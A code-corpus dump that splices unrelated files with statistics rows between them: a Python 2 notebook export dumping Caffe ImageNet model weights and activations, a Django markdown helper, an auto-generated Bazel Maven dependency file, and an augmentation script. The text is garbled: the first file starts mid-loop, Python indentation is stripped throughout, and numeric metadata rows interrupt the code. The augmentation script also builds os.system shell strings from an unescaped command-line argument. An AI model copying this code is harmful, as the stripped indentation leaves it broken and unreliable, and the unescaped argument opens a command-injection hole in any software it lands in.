f2.write("{0:.8f} ".format(element))
f2.write('\n')
f2.close()
n = n + 1
if n > 100:
break
# In[259]:
###imagenet-googlenet
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
import lmdb
import caffe
import argparse
import cv2
get_ipython().magic(u'matplotlib inline')
caffe_root = '/home/liguangli/work/caffe' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
model_def = caffe_root + '/models/bvlc_googlenet/deploy_batch1.prototxt'
model_weights = caffe_root + '/models/bvlc_googlenet/bvlc_googlenet.caffemodel'
outputdir = '/home/liguangli/split_net/googlenet'
# parse net
net = caffe.Net(model_def, # defines the structure of the model
model_weights, # contains the trained weights
caffe.TEST) # use test mode (e.g., don't perform dropout)
# set gpu
caffe.set_device(0)
caffe.set_mode_gpu()
# write params
for layer_name, param in net.params.iteritems():
print layer_name.replace('/', '_') + '\t' + str(param[0].data.shape)
f1 = open( outputdir + '/layer_param/' + layer_name.replace('/', '_') + '.txt', 'w+')
f1.write(layer_name + " ")
for temp in param[0].data.shape:
f1.write(str(temp) + " ")
f1.write("\n")
for element in param[0].data.flat:
f1.write("{0:.8f} ".format(element))
f1.write('\n')
f1.close()
print "params done"
# load the mean ImageNet image (as distributed with Caffe) for subtraction
mu = np.load(caffe_root + '/python/caffe/imagenet/ilsvrc_2012_mean.npy')
mu = mu.mean(1).mean(1) # average over pixels to obtain the mean (BGR) pixel values
print 'mean-subtracted values:', zip('BGR', mu)
# create transformer for the input called 'data'
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1)) # move image channels to outermost dimension
transformer.set_mean('data', mu) # subtract the dataset-mean value in each channel
#transformer.set_raw_scale('data', 255) # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR
# 1000 images forward
lmdbpath = '/dataset/ilsvrc12_val_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
n = 1
# create output files
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name.replace('/', '_') + '.txt', 'w+')
f2.write(layer_name + " ")
for temp in blob.data.shape:
f2.write(str(temp) + " ")
f2.write("\n")
f2.close()
print "output create done"
with env.begin() as txn:
cursor = txn.cursor()
for key, value in cursor:
datum = caffe.proto.caffe_pb2.Datum() #datum类型
datum.ParseFromString(value) #转成datum
flat_x = np.fromstring(datum.data, dtype=np.uint8) #转成numpy类型
x = flat_x.reshape(datum.channels, datum.height, datum.width)
xx = np.transpose(x, (1,2,0))
y = datum.label #图片的label
xx = cv2.cvtColor(xx, cv2.COLOR_BGR2RGB)
transformed_image = transformer.preprocess('data', xx)
#image = caffe.io.load_image(caffe_root + '/examples/images/cat.jpg')
#transformed_image = transformer.preprocess('data', image)
net.blobs['data'].data[...] = transformed_image
output = net.forward()
#print "done"
if n % 10 == 0:
print "{0}/100".format(n)
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name.replace('/', '_') + '.txt', 'a+')
for element in blob.data.flat:
f2.write("{0:.8f} ".format(element))
f2.write('\n')
f2.close()
n = n + 1
if n > 100:
break
# In[261]:
###imagenet-vgg16
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
import lmdb
import caffe
import argparse
import cv2
get_ipython().magic(u'matplotlib inline')
caffe_root = '/home/liguangli/work/caffe' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
model_def = caffe_root + '/models/vgg16/VGG_ILSVRC_16_layers_deploy.prototxt'
model_weights = caffe_root + '/models/vgg16/VGG_ILSVRC_16_layers.caffemodel'
outputdir = '/home/liguangli/split_net/vgg16'
# parse net
net = caffe.Net(model_def, # defines the structure of the model
model_weights, # contains the trained weights
caffe.TEST) # use test mode (e.g., don't perform dropout)
# set gpu
caffe.set_device(0)
caffe.set_mode_gpu()
# write params
for layer_name, param in net.params.iteritems():
print layer_name.replace('/', '_') + '\t' + str(param[0].data.shape)
f1 = open( outputdir + '/layer_param/' + layer_name.replace('/', '_') + '.txt', 'w+')
f1.write(layer_name + " ")
for temp in param[0].data.shape:
f1.write(str(temp) + " ")
f1.write("\n")
for element in param[0].data.flat:
f1.write("{0:.8f} ".format(element))
f1.write('\n')
f1.close()
print "params done"
# load the mean ImageNet image (as distributed with Caffe) for subtraction
mu = np.load(caffe_root + '/python/caffe/imagenet/ilsvrc_2012_mean.npy')
mu = mu.mean(1).mean(1) # average over pixels to obtain the mean (BGR) pixel values
print 'mean-subtracted values:', zip('BGR', mu)
# create transformer for the input called 'data'
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1)) # move image channels to outermost dimension
transformer.set_mean('data', mu) # subtract the dataset-mean value in each channel
#transformer.set_raw_scale('data', 255) # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR
# 1000 images forward
lmdbpath = '/dataset/ilsvrc12_val_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
n = 1
# create output files
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name.replace('/', '_') + '.txt', 'w+')
f2.write(layer_name + " ")
for temp in blob.data.shape:
f2.write(str(temp) + " ")
f2.write("\n")
f2.close()
print "output create done"
with env.begin() as txn:
cursor = txn.cursor()
for key, value in cursor:
datum = caffe.proto.caffe_pb2.Datum() #datum类型
datum.ParseFromString(value) #转成datum
flat_x = np.fromstring(datum.data, dtype=np.uint8) #转成numpy类型
x = flat_x.reshape(datum.channels, datum.height, datum.width)
xx = np.transpose(x, (1,2,0))
y = datum.label #图片的label
xx = cv2.cvtColor(xx, cv2.COLOR_BGR2RGB)
transformed_image = transformer.preprocess('data', xx)
#image = caffe.io.load_image(caffe_root + '/examples/images/cat.jpg')
#transformed_image = transformer.preprocess('data', image)
net.blobs['data'].data[...] = transformed_image
output = net.forward()
#print "done"
if n % 10 == 0:
print "{0}/100".format(n)
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name.replace('/', '_') + '.txt', 'a+')
for element in blob.data.flat:
f2.write("{0:.8f} ".format(element))
f2.write('\n')
f2.close()
n = n + 1
if n > 100:
break
# In[262]:
###imagenet-resnet-18
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
import lmdb
import caffe
import argparse
import cv2
get_ipython().magic(u'matplotlib inline')
caffe_root = '/home/liguangli/work/caffe' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
model_def = caffe_root + '/models/resnet-18/test_batch1.prototxt'
model_weights = caffe_root + '/models/resnet-18/resnet-18.caffemodel'
outputdir = '/home/liguangli/split_net/resnet-18'
# parse net
net = caffe.Net(model_def, # defines the structure of the model
model_weights, # contains the trained weights
caffe.TEST) # use test mode (e.g., don't perform dropout)
# set gpu
caffe.set_device(0)
caffe.set_mode_gpu()
# write params
for layer_name, param in net.params.iteritems():
print layer_name.replace('/', '_') + '\t' + str(param[0].data.shape)
f1 = open( outputdir + '/layer_param/' + layer_name.replace('/', '_') + '.txt', 'w+')
f1.write(layer_name + " ")
for temp in param[0].data.shape:
f1.write(str(temp) + " ")
f1.write("\n")
for element in param[0].data.flat:
f1.write("{0:.8f} ".format(element))
f1.write('\n')
f1.close()
print "params done"
# load the mean ImageNet image (as distributed with Caffe) for subtraction
mu = np.load(caffe_root + '/python/caffe/imagenet/ilsvrc_2012_mean.npy')
mu = mu.mean(1).mean(1) # average over pixels to obtain the mean (BGR) pixel values
print 'mean-subtracted values:', zip('BGR', mu)
# create transformer for the input called 'data'
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1)) # move image channels to outermost dimension
transformer.set_mean('data', mu) # subtract the dataset-mean value in each channel
#transformer.set_raw_scale('data', 255) # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR
# 1000 images forward
lmdbpath = '/dataset/ilsvrc12_val_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
n = 1
# create output files
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name.replace('/', '_') + '.txt', 'w+')
f2.write(layer_name + " ")
for temp in blob.data.shape:
f2.write(str(temp) + " ")
f2.write("\n")
f2.close()
print "output create done"
with env.begin() as txn:
cursor = txn.cursor()
for key, value in cursor:
datum = caffe.proto.caffe_pb2.Datum() #datum类型
datum.ParseFromString(value) #转成datum
flat_x = np.fromstring(datum.data, dtype=np.uint8) #转成numpy类型
x = flat_x.reshape(datum.channels, datum.height, datum.width)
xx = np.transpose(x, (1,2,0))
y = datum.label #图片的label
xx = cv2.cvtColor(xx, cv2.COLOR_BGR2RGB)
transformed_image = transformer.preprocess('data', xx)
#image = caffe.io.load_image(caffe_root + '/examples/images/cat.jpg')
#transformed_image = transformer.preprocess('data', image)
net.blobs['data'].data[...] = transformed_image
output = net.forward()
#print "done"
if n % 10 == 0:
print "{0}/100".format(n)
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name.replace('/', '_') + '.txt', 'a+')
for element in blob.data.flat:
f2.write("{0:.8f} ".format(element))
f2.write('\n')
f2.close()
n = n + 1
if n > 100:
break
# In[233]:
###imagenet-test
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
import lmdb
import caffe
import argparse
import cv2
get_ipython().magic(u'matplotlib inline')
caffe_root = '/home/liguangli/work/caffe' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
model_def = caffe_root + '/models/bvlc_alexnet/deploy_batch1.prototxt'
model_weights = caffe_root + '/models/bvlc_alexnet/bvlc_alexnet.caffemodel'
# parse net
net = caffe.Net(model_def, # defines the structure of the model
model_weights, # contains the trained weights
caffe.TEST) # use test mode (e.g., don't perform dropout)
# set gpu
caffe.set_device(0)
caffe.set_mode_gpu()
# write params
for layer_name, param in net.params.iteritems():
print layer_name + '\t' + str(param[0].data.shape)
print "params done"
# load the mean ImageNet image (as distributed with Caffe) for subtraction
mu = np.load(caffe_root + '/python/caffe/imagenet/ilsvrc_2012_mean.npy')
mu = mu.mean(1).mean(1) # average over pixels to obtain the mean (BGR) pixel values
print 'mean-subtracted values:', zip('BGR', mu)
# create transformer for the input called 'data'
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1)) # move image channels to outermost dimension
transformer.set_mean('data', mu) # subtract the dataset-mean value in each channel
#transformer.set_raw_scale('data', 255) # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR
# 1000 images forward
lmdbpath = '/dataset/ilsvrc12_val_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
n = 1
with env.begin() as txn:
cursor = txn.cursor()
for key, value in cursor:
datum = caffe.proto.caffe_pb2.Datum() #datum类型
datum.ParseFromString(value) #转成datum
flat_x = np.fromstring(datum.data, dtype=np.uint8) #转成numpy类型
x = flat_x.reshape(datum.channels, datum.height, datum.width)
xx = np.transpose(x, (1,2,0))
y = datum.label #图片的label
print y
xx = cv2.cvtColor(xx, cv2.COLOR_BGR2RGB)
pyplot.imshow(xx)
transformed_image = transformer.preprocess('data', xx)
net.blobs['data'].data[...] = transformed_image
output = net.forward()
output_prob = output['prob'][0] # the output probability vector for the first image in the batch
print 'predicted class is:', output_prob.argmax()
# load ImageNet labels
labels_file = caffe_root + '/data/ilsvrc12/synset_words.txt'
if not os.path.exists(labels_file):
get_ipython().system(u'../data/ilsvrc12/get_ilsvrc_aux.sh')
labels = np.loadtxt(labels_file, str, delimiter='\t')
print 'output label:', labels[output_prob.argmax()]
n = n + 1
if n > 1:
break
# In[263]:
n = 1
for layer_name, blob in net.blobs.iteritems():
print str(n) + " " + layer_name + str(blob.data.shape)
if n == 1:
print max(blob.data.flat)
print min(blob.data.flat)
pyplot.hist(blob.data.flat,100)
n = n + 1
# In[ ]:
| 31.97037 | 124 | 0.654966 | 3,701 | 25,896 | 4.481491 | 0.071602 | 0.032015 | 0.015194 | 0.01447 | 0.934041 | 0.928916 | 0.90492 | 0.896358 | 0.885626 | 0.877909 | 0 | 0.025704 | 0.208256 | 25,896 | 809 | 125 | 32.009889 | 0.783251 | 0.224938 | 0 | 0.917137 | 0 | 0 | 0.147444 | 0.085644 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.141243 | null | null | 0.086629 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1c0d5fa0ac57596646e81ed65681848227c1925a | 178 | py | Python | machina/core/markdown.py | danielmcquillen/django-machina | 08aa3a58a7889b0d5a5bcd6c24965c524762c7a6 | [
"BSD-3-Clause"
] | null | null | null | machina/core/markdown.py | danielmcquillen/django-machina | 08aa3a58a7889b0d5a5bcd6c24965c524762c7a6 | [
"BSD-3-Clause"
] | 2 | 2021-06-02T00:29:11.000Z | 2021-09-01T23:02:30.000Z | machina/core/markdown.py | danielmcquillen/django-machina | 08aa3a58a7889b0d5a5bcd6c24965c524762c7a6 | [
"BSD-3-Clause"
] | null | null | null | from django.utils.encoding import smart_text
from markdown2 import markdown as _markdown
def markdown(text, **kwargs):
return smart_text(_markdown(text, **kwargs).strip())
| 25.428571 | 56 | 0.775281 | 24 | 178 | 5.583333 | 0.583333 | 0.134328 | 0.268657 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00641 | 0.123596 | 178 | 6 | 57 | 29.666667 | 0.852564 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
1c4d9c9f499de0cb780d4716ab1e1f51f13a7239 | 12,424 | bzl | Python | examples/third_party/aether/requires.bzl | pubref/rules_require | 75250be1187dd610bb085af459b312d0af83043b | [
"Apache-2.0"
] | null | null | null | examples/third_party/aether/requires.bzl | pubref/rules_require | 75250be1187dd610bb085af459b312d0af83043b | [
"Apache-2.0"
] | 1 | 2017-04-04T17:06:51.000Z | 2017-04-05T07:17:13.000Z | examples/third_party/aether/requires.bzl | pubref/rules_require | 75250be1187dd610bb085af459b312d0af83043b | [
"Apache-2.0"
] | null | null | null | # Auto-generated by org.pubref.tools.gradle.GenRequires, do not edit:
load('@org_pubref_rules_require//require:rules.bzl',
_require = 'require')
DEPS = {
'org_codehaus_plexus_plexus_utils': {
'kind': 'maven_jar',
'artifact': 'org.codehaus.plexus:plexus-utils:jar:3.0.22',
},
'org_apache_maven_maven_model_builder': {
'kind': 'maven_jar',
'artifact': 'org.apache.maven:maven-model-builder:jar:3.3.9',
},
'org_slf4j_slf4j_api': {
'kind': 'maven_jar',
'artifact': 'org.slf4j:slf4j-api:jar:1.6.2',
},
'org_apache_maven_maven_builder_support': {
'kind': 'maven_jar',
'artifact': 'org.apache.maven:maven-builder-support:jar:3.3.9',
},
'org_eclipse_aether_aether_transport_http': {
'kind': 'maven_jar',
'artifact': 'org.eclipse.aether:aether-transport-http:jar:1.1.0',
},
'org_apache_httpcomponents_httpcore': {
'kind': 'maven_jar',
'artifact': 'org.apache.httpcomponents:httpcore:jar:4.3.2',
},
'org_eclipse_aether_aether_util': {
'kind': 'maven_jar',
'artifact': 'org.eclipse.aether:aether-util:jar:1.1.0',
},
'org_eclipse_aether_aether_connector_basic': {
'kind': 'maven_jar',
'artifact': 'org.eclipse.aether:aether-connector-basic:jar:1.1.0',
},
'org_slf4j_jcl_over_slf4j': {
'kind': 'maven_jar',
'artifact': 'org.slf4j:jcl-over-slf4j:jar:1.6.2',
},
'org_eclipse_aether_aether_spi': {
'kind': 'maven_jar',
'artifact': 'org.eclipse.aether:aether-spi:jar:1.1.0',
},
'commons_codec_commons_codec': {
'kind': 'maven_jar',
'artifact': 'commons-codec:commons-codec:jar:1.6',
},
'org_apache_maven_maven_repository_metadata': {
'kind': 'maven_jar',
'artifact': 'org.apache.maven:maven-repository-metadata:jar:3.3.9',
},
'org_apache_httpcomponents_httpclient': {
'kind': 'maven_jar',
'artifact': 'org.apache.httpcomponents:httpclient:jar:4.3.5',
},
'org_apache_maven_maven_aether_provider': {
'kind': 'maven_jar',
'artifact': 'org.apache.maven:maven-aether-provider:jar:3.3.9',
},
'org_apache_maven_maven_model': {
'kind': 'maven_jar',
'artifact': 'org.apache.maven:maven-model:jar:3.3.9',
},
'org_apache_maven_maven_artifact': {
'kind': 'maven_jar',
'artifact': 'org.apache.maven:maven-artifact:jar:3.3.9',
},
'org_apache_commons_commons_lang3': {
'kind': 'maven_jar',
'artifact': 'org.apache.commons:commons-lang3:jar:3.4',
},
'org_eclipse_aether_aether_transport_file': {
'kind': 'maven_jar',
'artifact': 'org.eclipse.aether:aether-transport-file:jar:1.1.0',
},
'com_google_guava_guava': {
'kind': 'maven_jar',
'artifact': 'com.google.guava:guava:jar:18.0',
},
'org_eclipse_aether_aether_api': {
'kind': 'maven_jar',
'artifact': 'org.eclipse.aether:aether-api:jar:1.1.0',
},
'org_codehaus_plexus_plexus_interpolation': {
'kind': 'maven_jar',
'artifact': 'org.codehaus.plexus:plexus-interpolation:jar:1.21',
},
'org_codehaus_plexus_plexus_component_annotations': {
'kind': 'maven_jar',
'artifact': 'org.codehaus.plexus:plexus-component-annotations:jar:1.6',
},
'org_eclipse_aether_aether_impl': {
'kind': 'maven_jar',
'artifact': 'org.eclipse.aether:aether-impl:jar:1.1.0',
},
}
def compileClasspath(deps = DEPS):
_require([
'org_codehaus_plexus_plexus_utils',
'org_apache_maven_maven_model_builder',
'org_slf4j_slf4j_api',
'org_apache_maven_maven_builder_support',
'org_eclipse_aether_aether_transport_http',
'org_apache_httpcomponents_httpcore',
'org_eclipse_aether_aether_util',
'org_eclipse_aether_aether_connector_basic',
'org_slf4j_jcl_over_slf4j',
'org_eclipse_aether_aether_spi',
'commons_codec_commons_codec',
'org_apache_maven_maven_repository_metadata',
'org_apache_httpcomponents_httpclient',
'org_apache_maven_maven_aether_provider',
'org_apache_maven_maven_model',
'org_apache_maven_maven_artifact',
'org_apache_commons_commons_lang3',
'org_eclipse_aether_aether_transport_file',
'com_google_guava_guava',
'org_eclipse_aether_aether_api',
'org_codehaus_plexus_plexus_interpolation',
'org_codehaus_plexus_plexus_component_annotations',
'org_eclipse_aether_aether_impl',
], deps = deps)
def compileOnly(deps = DEPS):
_require([
'org_codehaus_plexus_plexus_utils',
'org_apache_maven_maven_model_builder',
'org_slf4j_slf4j_api',
'org_apache_maven_maven_builder_support',
'org_eclipse_aether_aether_transport_http',
'org_apache_httpcomponents_httpcore',
'org_eclipse_aether_aether_util',
'org_eclipse_aether_aether_connector_basic',
'org_slf4j_jcl_over_slf4j',
'org_eclipse_aether_aether_spi',
'commons_codec_commons_codec',
'org_apache_maven_maven_repository_metadata',
'org_apache_httpcomponents_httpclient',
'org_apache_maven_maven_aether_provider',
'org_apache_maven_maven_model',
'org_apache_maven_maven_artifact',
'org_apache_commons_commons_lang3',
'org_eclipse_aether_aether_transport_file',
'com_google_guava_guava',
'org_eclipse_aether_aether_api',
'org_codehaus_plexus_plexus_interpolation',
'org_codehaus_plexus_plexus_component_annotations',
'org_eclipse_aether_aether_impl',
], deps = deps)
def testCompile(deps = DEPS):
_require([
'org_codehaus_plexus_plexus_utils',
'org_apache_maven_maven_model_builder',
'org_slf4j_slf4j_api',
'org_apache_maven_maven_builder_support',
'org_eclipse_aether_aether_transport_http',
'org_apache_httpcomponents_httpcore',
'org_eclipse_aether_aether_util',
'org_eclipse_aether_aether_connector_basic',
'org_slf4j_jcl_over_slf4j',
'org_eclipse_aether_aether_spi',
'commons_codec_commons_codec',
'org_apache_maven_maven_repository_metadata',
'org_apache_httpcomponents_httpclient',
'org_apache_maven_maven_aether_provider',
'org_apache_maven_maven_model',
'org_apache_maven_maven_artifact',
'org_apache_commons_commons_lang3',
'org_eclipse_aether_aether_transport_file',
'com_google_guava_guava',
'org_eclipse_aether_aether_api',
'org_codehaus_plexus_plexus_interpolation',
'org_codehaus_plexus_plexus_component_annotations',
'org_eclipse_aether_aether_impl',
], deps = deps)
def testCompileClasspath(deps = DEPS):
_require([
'org_codehaus_plexus_plexus_utils',
'org_apache_maven_maven_model_builder',
'org_slf4j_slf4j_api',
'org_apache_maven_maven_builder_support',
'org_eclipse_aether_aether_transport_http',
'org_apache_httpcomponents_httpcore',
'org_eclipse_aether_aether_util',
'org_eclipse_aether_aether_connector_basic',
'org_slf4j_jcl_over_slf4j',
'org_eclipse_aether_aether_spi',
'commons_codec_commons_codec',
'org_apache_maven_maven_repository_metadata',
'org_apache_httpcomponents_httpclient',
'org_apache_maven_maven_aether_provider',
'org_apache_maven_maven_model',
'org_apache_maven_maven_artifact',
'org_apache_commons_commons_lang3',
'org_eclipse_aether_aether_transport_file',
'com_google_guava_guava',
'org_eclipse_aether_aether_api',
'org_codehaus_plexus_plexus_interpolation',
'org_codehaus_plexus_plexus_component_annotations',
'org_eclipse_aether_aether_impl',
], deps = deps)
def archives(deps = DEPS):
_require([
], deps = deps)
def default(deps = DEPS):
_require([
'org_codehaus_plexus_plexus_utils',
'org_apache_maven_maven_model_builder',
'org_slf4j_slf4j_api',
'org_apache_maven_maven_builder_support',
'org_eclipse_aether_aether_transport_http',
'org_apache_httpcomponents_httpcore',
'org_eclipse_aether_aether_util',
'org_eclipse_aether_aether_connector_basic',
'org_slf4j_jcl_over_slf4j',
'org_eclipse_aether_aether_spi',
'commons_codec_commons_codec',
'org_apache_maven_maven_repository_metadata',
'org_apache_httpcomponents_httpclient',
'org_apache_maven_maven_aether_provider',
'org_apache_maven_maven_model',
'org_apache_maven_maven_artifact',
'org_apache_commons_commons_lang3',
'org_eclipse_aether_aether_transport_file',
'com_google_guava_guava',
'org_eclipse_aether_aether_api',
'org_codehaus_plexus_plexus_interpolation',
'org_codehaus_plexus_plexus_component_annotations',
'org_eclipse_aether_aether_impl',
], deps = deps)
def testCompileOnly(deps = DEPS):
_require([
'org_codehaus_plexus_plexus_utils',
'org_apache_maven_maven_model_builder',
'org_slf4j_slf4j_api',
'org_apache_maven_maven_builder_support',
'org_eclipse_aether_aether_transport_http',
'org_apache_httpcomponents_httpcore',
'org_eclipse_aether_aether_util',
'org_eclipse_aether_aether_connector_basic',
'org_slf4j_jcl_over_slf4j',
'org_eclipse_aether_aether_spi',
'commons_codec_commons_codec',
'org_apache_maven_maven_repository_metadata',
'org_apache_httpcomponents_httpclient',
'org_apache_maven_maven_aether_provider',
'org_apache_maven_maven_model',
'org_apache_maven_maven_artifact',
'org_apache_commons_commons_lang3',
'org_eclipse_aether_aether_transport_file',
'com_google_guava_guava',
'org_eclipse_aether_aether_api',
'org_codehaus_plexus_plexus_interpolation',
'org_codehaus_plexus_plexus_component_annotations',
'org_eclipse_aether_aether_impl',
], deps = deps)
def compile(deps = DEPS):
_require([
'org_codehaus_plexus_plexus_utils',
'org_apache_maven_maven_model_builder',
'org_slf4j_slf4j_api',
'org_apache_maven_maven_builder_support',
'org_eclipse_aether_aether_transport_http',
'org_apache_httpcomponents_httpcore',
'org_eclipse_aether_aether_util',
'org_eclipse_aether_aether_connector_basic',
'org_slf4j_jcl_over_slf4j',
'org_eclipse_aether_aether_spi',
'commons_codec_commons_codec',
'org_apache_maven_maven_repository_metadata',
'org_apache_httpcomponents_httpclient',
'org_apache_maven_maven_aether_provider',
'org_apache_maven_maven_model',
'org_apache_maven_maven_artifact',
'org_apache_commons_commons_lang3',
'org_eclipse_aether_aether_transport_file',
'com_google_guava_guava',
'org_eclipse_aether_aether_api',
'org_codehaus_plexus_plexus_interpolation',
'org_codehaus_plexus_plexus_component_annotations',
'org_eclipse_aether_aether_impl',
], deps = deps)
def runtime(deps = DEPS):
_require([
'org_codehaus_plexus_plexus_utils',
'org_apache_maven_maven_model_builder',
'org_slf4j_slf4j_api',
'org_apache_maven_maven_builder_support',
'org_eclipse_aether_aether_transport_http',
'org_apache_httpcomponents_httpcore',
'org_eclipse_aether_aether_util',
'org_eclipse_aether_aether_connector_basic',
'org_slf4j_jcl_over_slf4j',
'org_eclipse_aether_aether_spi',
'commons_codec_commons_codec',
'org_apache_maven_maven_repository_metadata',
'org_apache_httpcomponents_httpclient',
'org_apache_maven_maven_aether_provider',
'org_apache_maven_maven_model',
'org_apache_maven_maven_artifact',
'org_apache_commons_commons_lang3',
'org_eclipse_aether_aether_transport_file',
'com_google_guava_guava',
'org_eclipse_aether_aether_api',
'org_codehaus_plexus_plexus_interpolation',
'org_codehaus_plexus_plexus_component_annotations',
'org_eclipse_aether_aether_impl',
], deps = deps)
def testRuntime(deps = DEPS):
_require([
'org_codehaus_plexus_plexus_utils',
'org_apache_maven_maven_model_builder',
'org_slf4j_slf4j_api',
'org_apache_maven_maven_builder_support',
'org_eclipse_aether_aether_transport_http',
'org_apache_httpcomponents_httpcore',
'org_eclipse_aether_aether_util',
'org_eclipse_aether_aether_connector_basic',
'org_slf4j_jcl_over_slf4j',
'org_eclipse_aether_aether_spi',
'commons_codec_commons_codec',
'org_apache_maven_maven_repository_metadata',
'org_apache_httpcomponents_httpclient',
'org_apache_maven_maven_aether_provider',
'org_apache_maven_maven_model',
'org_apache_maven_maven_artifact',
'org_apache_commons_commons_lang3',
'org_eclipse_aether_aether_transport_file',
'com_google_guava_guava',
'org_eclipse_aether_aether_api',
'org_codehaus_plexus_plexus_interpolation',
'org_codehaus_plexus_plexus_component_annotations',
'org_eclipse_aether_aether_impl',
], deps = deps)
| 35.907514 | 75 | 0.760625 | 1,569 | 12,424 | 5.393881 | 0.049713 | 0.105282 | 0.145575 | 0.200165 | 0.937256 | 0.89909 | 0.837883 | 0.827721 | 0.763323 | 0.740872 | 0 | 0.011306 | 0.131439 | 12,424 | 345 | 76 | 36.011594 | 0.772959 | 0.005393 | 0 | 0.750751 | 1 | 0 | 0.743262 | 0.688223 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03003 | false | 0 | 0 | 0 | 0.03003 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
1c7753f511490504911854f3ff431629cd281d02 | 7,079 | py | Python | src/dataGenerator.py | AhmedAldahshoury/BringlsICR | 00cb14d923226814ddd4e9f2ebb184097228ec22 | [
"MIT"
] | null | null | null | src/dataGenerator.py | AhmedAldahshoury/BringlsICR | 00cb14d923226814ddd4e9f2ebb184097228ec22 | [
"MIT"
] | 6 | 2021-06-08T22:31:19.000Z | 2022-03-12T00:48:52.000Z | src/dataGenerator.py | AhmedAldahshoury/BringlsICR | 00cb14d923226814ddd4e9f2ebb184097228ec22 | [
"MIT"
] | 1 | 2021-04-28T17:37:10.000Z | 2021-04-28T17:37:10.000Z | import os, sys, subprocess
fileName = sys.argv[1]
#print("rotating: " + fileName)
#command1 = subprocess.Popen(['python', 'dataGenerator.py', file, '| tee -a output.txt'])
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' rot_1 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' rot_2 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' rot_3 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' rot_4 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' rot_5 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' rot_-1 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' rot_-2 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' rot_-3 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' rot_-4 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' rot_-5 | tee -a output.txt ')
#print("bluring: " + fileName)
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' blur_0.1 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' blur_0.2 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' blur_0.3 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' blur_0.4 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' blur_0.5 | tee -a output.txt ')
#print("translating 1: " + fileName)
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_1_1 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_2_2 | tee -a output.txt ')
